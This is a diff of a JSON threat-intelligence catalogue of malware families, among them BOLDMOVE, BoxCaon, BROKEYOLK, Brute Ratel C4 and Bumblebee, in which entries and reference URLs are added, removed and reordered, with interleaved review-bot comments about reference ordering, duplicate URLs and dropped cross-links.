"value": "Bohmini"
},
+ {
+ "description": "According to Mandiant, this malware family is attributed to potential chinese background and its Linux variant is related to exploitation of Fortinet's SSL-VPN (CVE-2022-42475).",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.boldmove",
+ "https://www.mandiant.com/resources/blog/chinese-actors-exploit-fortios-flaw",
+ "https://thehackernews.com/2023/01/new-chinese-malware-spotted-exploiting.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4212b386-b6de-4b06-86f1-ba20b5c01447",
+ "value": "BOLDMOVE (Windows)"
+ },
{
"description": "",
"meta": {
@@ -15240,26 +16234,32 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "9ff6e087-6755-447a-b537-8f06c7aa4a85",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "1b8cfb29-7a63-459a-bc90-c9ea3634b21c",
"value": "Bookworm"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.boombox",
+ "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf",
+ "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/",
+ "https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e8112e1a-4fda-4857-8df8-0ba7fb5ea1ba",
+ "value": "BOOMBOX"
+ },
{
"description": "FireEye describes BOOSTWRITE as a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate ‘Dwrite.dll’ provided by the Microsoft DirectX Typography Services. The application loads the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads ‘Dwrite’. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.boostwrite",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html"
+ "https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf"
],
"synonyms": [],
"type": []
@@ -15272,8 +16272,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bootwreck",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-latin-american-financial-organizations-again/",
- "https://content.fireeye.com/apt/rpt-apt38"
+ "https://content.fireeye.com/apt/rpt-apt38",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-latin-american-financial-organizations-again/"
],
"synonyms": [
"MBRkiller"
@@ -15323,39 +16323,34 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "52d9a474-fc37-48b5-8e39-4394194b9573",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "80487bca-7629-4cb2-bf5b-993d5568b699",
"value": "Bouncer"
},
+ {
+ "description": "According to Checkpoint Research, this malware family has the ability to download and upload files, run commands and send the attackers the results. It has been observed being used by threat actor IndigoZebra.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.boxcaon",
+ "https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5ccb9d4c-bb9b-48ee-9ea3-a64a81eb210f",
+ "value": "BoxCaon"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok",
- "https://securelist.com/apt-trends-report-q1-2021/101967/",
"https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/",
"https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "cff2e174-52b8-4304-903a-012f97d70b7c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "f9d0e934-879c-4668-b959-6bf7bdc96f5d",
"value": "Bozok"
},
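Review bot: the BoxCaon description names the source as `Checkpoint Research`; the vendor's name is Check Point Research, matching the research.checkpoint.com ref in the same entry. The Bouncer and Bozok `related` entries (dest-uuids 52d9a474-fc37-48b5-8e39-4394194b9573 and cff2e174-52b8-4304-903a-012f97d70b7c) are dropped in this hunk; please confirm in the commit message that these cross-galaxy links are regenerated elsewhere.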
@@ -15377,32 +16372,23 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://www.us-cert.gov/ncas/alerts/TA18-149A",
- "https://swanleesec.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1",
- "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://swanleesec.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-2",
"https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-2",
+ "https://swanleesec.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1",
"https://www.us-cert.gov/ncas/analysis-reports/AR18-149A",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
"https://www.secureworks.com/research/threat-profiles/nickel-academy",
"https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/",
- "https://swanleesec.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-2",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
+ "https://www.us-cert.gov/ncas/alerts/TA18-149A",
+ "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments"
],
"synonyms": [
"SORRYBRUTE"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "4c057ade-6989-11e8-9efd-ab33ed427468",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d97ae60e-612a-4feb-908a-8c4d32e9d763",
"value": "Brambul"
},
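Review bot: apart from dropping the `related` entry (dest-uuid 4c057ade-6989-11e8-9efd-ab33ed427468), this hunk changes nothing for Brambul: the seven removed refs (broadcom, lexfo, TA18-149A, the two swanleesec and two metaswan posts, qianxin) are all re-added in a different order. Sorting `refs` deterministically in the generator would leave the dropped relation as the only line in the diff and keep hunks like this reviewable.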
@@ -15485,6 +16471,19 @@
"uuid": "fd4665b8-59b6-427f-a22d-bb3b50e9e176",
"value": "BrittleBush"
},
+ {
+ "description": "According to Mandiant, BROKEYOLK is a .NET downloader that downloads and executes a file from a hard-coded command and control (C2) server. The malware communicates via SOAP (Simple Object Access Protocol) requests using HTTP.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brokeyolk",
+ "https://www.mandiant.com/media/17826"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "dd19501d-c23e-4a52-8cef-726a8483d6c2",
+ "value": "BROKEYOLK"
+ },
{
"description": "",
"meta": {
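Review bot: the second ref on the new BROKEYOLK entry, `https://www.mandiant.com/media/17826`, is an opaque asset id that tells a reader nothing about which report it is and will break the moment the CDN path changes; cite the report's landing page or an archived copy alongside it so the source stays identifiable.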
@@ -15504,37 +16503,57 @@
"description": "",
"meta": {
"refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.brushaloader",
- "https://www.proofpoint.com/us/threat-insight/post/brushaloader-still-sweeping-victims-one-year-later",
- "https://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/",
- "https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bruh_wiper",
+ "https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "e1ca79ea-5628-4266-bb36-3892c7126ef4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
- "uuid": "75a03c4f-8a97-4fc0-a69e-b2e73e4564fc",
- "value": "BrushaLoader"
+ "uuid": "33b76b3f-7056-4892-a134-6e984f500c3c",
+ "value": "Bruh Wiper"
},
{
"description": "",
"meta": {
"refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4",
- "https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brushaloader",
+ "https://www.proofpoint.com/us/threat-insight/post/brushaloader-still-sweeping-victims-one-year-later",
+ "https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html",
+ "https://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/"
],
"synonyms": [],
"type": []
},
+ "uuid": "75a03c4f-8a97-4fc0-a69e-b2e73e4564fc",
+ "value": "BrushaLoader"
+ },
+ {
+ "description": "Brute Ratel is a a Customized Command and Control Center for Red Team and Adversary Simulation\r\n\r\nSMB and TCP payloads provide functionality to write custom external C2 channels over legitimate websites such as Slack, Discord, Microsoft Teams and more.\r\nBuilt-in debugger to detect EDR userland hooks.\r\nAbility to keep memory artifacts hidden from EDRs and AV.\r\nDirect Windows SYS calls on the fly.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4",
+ "https://medium.com/walmartglobaltech/brute-ratel-config-decoding-update-7820455022cb",
+ "https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/",
+ "https://0xdarkvortex.dev/hiding-in-plainsight/",
+ "https://protectedmo.de/brute.html",
+ "https://twitter.com/embee_research/status/1580030303950995456?s=20&t=0vfXnrCXaVSX-P-hiSrFwA",
+ "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f",
+ "https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/",
+ "https://web.archive.org/web/20230216110153/https://yoroi.company/research/hunting-cyber-evil-ratels-from-the-targeted-attacks-to-the-widespread-usage-of-brute-ratel/",
+ "https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/",
+ "https://www.youtube.com/watch?v=a7W6rhkpVSM",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://andreafortuna.org/2023/02/23/how-to-detect-brute-ratel-activities",
+ "https://blog.spookysec.net/analyzing-brc4-badgers/",
+ "https://socradar.io/brute-ratel-utilized-by-threat-actors-in-new-ransomware-operations/",
+ "https://bruteratel.com/research/feature-update/2021/06/01/PE-Reflection-Long-Live-The-King/",
+ "https://www.splunk.com/en_us/blog/security/deliver-a-strike-by-reversing-a-badger-brute-ratel-detection-and-analysis.html"
+ ],
+ "synonyms": [
+ "BruteRatel"
+ ],
+ "type": []
+ },
"uuid": "19e4df44-d469-4903-8999-22d650a21dd7",
"value": "Brute Ratel C4"
},
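Review bot: the Brute Ratel C4 description has a doubled article ("is a a Customized Command and Control Center") and pastes the vendor's feature bullets as bare fragments joined by `\r\n`, so it reads as marketing copy rather than a cluster description; fix the typo and either join the fragments into sentences or trim them to the first line. In the same hunk the Twitter ref carries session tracking parameters (`?s=20&t=0vfXnrCXaVSX-P-hiSrFwA`) that should be stripped so the bare `/status/1580030303950995456` form is stored, and BrushaLoader loses its `related` entry (dest-uuid e1ca79ea-5628-4266-bb36-3892c7126ef4) while keeping uuid 75a03c4f-8a97-4fc0-a69e-b2e73e4564fc, which looks like a generator regression rather than an intended change.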
@@ -15557,9 +16576,9 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005",
"https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
- "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-palace",
"https://github.com/nccgroup/Royal_APT",
- "https://www.secureworks.com/research/threat-profiles/bronze-palace"
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
],
"synonyms": [],
"type": []
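Review bot: this hunk only swaps the positions of the nccgroup.trust and secureworks refs on BS2005; no ref is added or removed. The same pure reordering recurs below for Bubblewrap, Bundestrojaner, Bunitu, Calmthorn, CampoLoader and Cannon, which means the export writes `refs` in whatever order the source returns them. Sort the list in the generator (by URL, for instance) so an unchanged cluster produces an empty diff.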
@@ -15585,8 +16604,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bubblewrap",
- "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html",
- "https://attack.mitre.org/software/S0043/"
+ "https://attack.mitre.org/software/S0043/",
+ "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html"
],
"synonyms": [],
"type": []
@@ -15599,36 +16618,37 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.buer",
- "https://www.fortinet.com/blog/threat-research/signed-sealed-and-delivered-signed-xll-file-delivers-buer-loader",
- "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://krabsonsecurity.com/2019/12/05/buer-loader-new-russian-loader-on-the-market-with-interesting-persistence/",
- "https://www.proofpoint.com/us/blog/threat-insight/new-variant-buer-loader-written-rust",
- "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware",
- "https://twitter.com/SophosLabs/status/1321844306970251265",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://tehtris.com/en/blog/buer-loader-analysis-a-rusted-malware-program",
- "https://medium.com/walmartglobaltech/buerloader-updates-3e34c1949b96",
- "https://blog.minerva-labs.com/stopping-buerloader",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
- "https://twitter.com/StopMalvertisin/status/1182505434231398401",
- "http://www.secureworks.com/research/threat-profiles/gold-symphony",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.proofpoint.com/us/threat-insight/post/buer-new-loader-emerges-underground-marketplace",
- "http://www.secureworks.com/research/threat-profiles/gold-blackburn",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
- "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/",
- "https://www.trendmicro.com/en_us/research/21/k/a-review-and-analysis-of-2021-buer-loader-campaigns.html",
- "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
- "https://blog.group-ib.com/prometheus-tds",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/k/a-review-and-analysis-of-2021-buer-loader-campaigns/TechnicalBrief-An-Analysis-of-Buer-Loader.pdf",
"https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/",
- "https://labs.vipre.com/buer-loader-found-in-an-unusual-email-attachment/",
+ "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware",
+ "https://www.fortinet.com/blog/threat-research/signed-sealed-and-delivered-signed-xll-file-delivers-buer-loader",
+ "https://krabsonsecurity.com/2019/12/05/buer-loader-new-russian-loader-on-the-market-with-interesting-persistence/",
+ "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "http://www.secureworks.com/research/threat-profiles/gold-symphony",
+ "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/",
+ "https://twitter.com/StopMalvertisin/status/1182505434231398401",
+ "https://blog.minerva-labs.com/stopping-buerloader",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/k/a-review-and-analysis-of-2021-buer-loader-campaigns/TechnicalBrief-An-Analysis-of-Buer-Loader.pdf",
+ "https://blog.group-ib.com/prometheus-tds",
"https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/",
+ "https://www.proofpoint.com/us/threat-insight/post/buer-new-loader-emerges-underground-marketplace",
+ "https://medium.com/walmartglobaltech/buerloader-updates-3e34c1949b96",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://www.trendmicro.com/en_us/research/21/k/a-review-and-analysis-of-2021-buer-loader-campaigns.html",
+ "https://twitter.com/SophosLabs/status/1321844306970251265",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
+ "https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://labs.vipre.com/buer-loader-found-in-an-unusual-email-attachment/",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://www.proofpoint.com/us/blog/threat-insight/new-variant-buer-loader-written-rust",
+ "http://www.secureworks.com/research/threat-profiles/gold-blackburn",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://tehtris.com/en/blog/buer-loader-analysis-a-rusted-malware-program",
"https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
],
"synonyms": [
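Review bot: the only substantive change to Buer is the single new ref (`https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/`); the other thirty-odd lines re-emit the existing refs in a different order, which buries that one addition. With sorted refs this hunk would be one `+` line.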
@@ -15672,18 +16692,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/",
+ "https://malware-research.org/carbanak-source-code-leaked/",
+ "https://blog.dcso.de/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/",
+ "https://www.scythe.io/library/threatthursday-buhtrap",
"https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/",
"https://www.group-ib.com/brochures/gib-buhtrap-report.pdf",
"https://www.welivesecurity.com/2019/07/11/buhtrap-zero-day-espionage-campaigns/",
- "https://blog.dcso.de/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/",
- "https://www.scythe.io/library/threatthursday-buhtrap",
- "https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code",
- "https://malware-research.org/carbanak-source-code-leaked/",
"https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8e498912-44f8-4ea0-ac50-4544f0fedd6c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
"https://www.symantec.com/connect/blogs/russian-bank-employees-received-fake-job-offers-targeted-email-attack",
- "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/",
- "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/"
+ "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/",
+ "https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/",
+ "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/"
],
"synonyms": [
"Ratopak"
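Review bot: after this hunk Buhtrap lists the DCSO analysis three times: `https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/` (kept as context), the same URL without the trailing slash (re-added here), and `https://blog.dcso.de/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/`. Normalize trailing slashes before de-duplicating refs and keep one canonical host per source so each article appears once.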
@@ -15698,47 +16718,68 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bumblebee",
- "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti",
- "https://www.bleepingcomputer.com/news/security/new-bumblebee-malware-replaces-contis-bazarloader-in-cyberattacks/",
- "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine",
- "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
- "https://isc.sans.edu/diary/rss/28636",
- "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/",
- "https://blog.sekoia.io/bumblebee-a-new-trendy-loader-for-initial-access-brokers/",
- "https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/",
- "https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control",
- "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns",
- "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks",
- "https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/",
- "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike",
- "https://research.openanalysis.net/bumblebee/malware/loader/unpacking/2022/05/12/bumblebee_loader.html",
- "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest",
- "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/",
- "https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g",
- "https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/",
- "https://isc.sans.edu/diary/rss/28664",
- "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise",
- "https://www.infinitumit.com.tr/bumblebee-loader-malware-analysis/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime",
"https://www.deepinstinct.com/blog/the-dark-side-of-bumblebee-malware-loader",
- "https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/",
+ "https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/",
+ "https://www.youtube.com/watch?v=pIXl79IPkLI",
+ "https://www.youtube.com/watch?v=JoKJNfLAc0Y",
+ "https://www.bleepingcomputer.com/news/security/new-bumblebee-malware-replaces-contis-bazarloader-in-cyberattacks/",
+ "https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/",
+ "https://blog.krakz.fr/articles/bumblebee/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime",
+ "https://www.aspirets.com/blog/bumblebee-malware-loader-threat-analysis/",
"https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-connection-686379311056",
+ "https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/",
+ "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine",
+ "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/",
+ "https://blog.cerbero.io/?p=2617",
+ "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest",
+ "https://threathunt.blog/bzz-bzz-bumblebee-loader",
+ "https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/",
+ "https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/",
+ "https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/",
+ "https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/",
+ "https://blog.gigamon.com/2021/09/10/rendering-threats-a-network-perspective/",
+ "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
+ "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/bumblebee-docusign-campaign",
+ "https://cloudsek.com/technical-analysis-of-bumblebee-malware-loader/",
+ "https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control",
+ "https://isc.sans.edu/diary/Bumblebee+Malware+from+TransferXL+URLs/28664",
+ "https://twitter.com/threatinsight/status/1648330456364883968",
"https://www.proofpoint.com/us/blog/threat-insight/bumblebee-is-still-transforming",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/",
+ "https://community.riskiq.com/article/0b211905/description",
+ "https://blog.sekoia.io/bumblebee-a-new-trendy-loader-for-initial-access-brokers/",
+ "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns",
+ "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike",
+ "https://www.infinitumit.com.tr/bumblebee-loader-malware-analysis/",
+ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
+ "https://blog.talosintelligence.com/following-the-lnk-metadata-trail",
+ "https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads",
"https://isc.sans.edu/diary/28636",
- "https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/"
+ "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return",
+ "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise",
+ "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/",
+ "https://www.intrinsec.com/emotet-returns-and-deploys-loaders/",
+ "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks",
+ "https://research.openanalysis.net/bumblebee/malware/loader/unpacking/2022/05/12/bumblebee_loader.html",
+ "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti",
+ "https://isc.sans.edu/diary/rss/28636",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://isc.sans.edu/diary/rss/28664",
+ "https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g",
+ "https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/",
+ "https://twitter.com/ESETresearch/status/1577963080096555008",
+ "https://www.logpoint.com/wp-content/uploads/2022/05/buzz-of-the-bumblebee-a-new-malicious-loader-threat-report-no-3.pdf"
